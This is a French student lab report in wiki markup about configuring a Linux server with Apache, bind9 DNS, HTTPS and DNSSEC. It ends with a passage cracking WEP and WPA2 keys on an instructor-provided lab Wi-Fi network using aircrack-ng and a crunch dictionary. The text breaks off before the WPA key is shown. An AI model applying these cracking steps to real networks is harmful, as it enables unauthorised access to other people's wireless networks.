    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
==== Paquetages nécessaires pour RAID5 ====&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
	'''dnssec-validation auto;'''&lt;br /&gt;
	'''dnssec-enable yes;'''&lt;br /&gt;
	'''dnssec-lookaside auto;'''&lt;br /&gt;
	&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
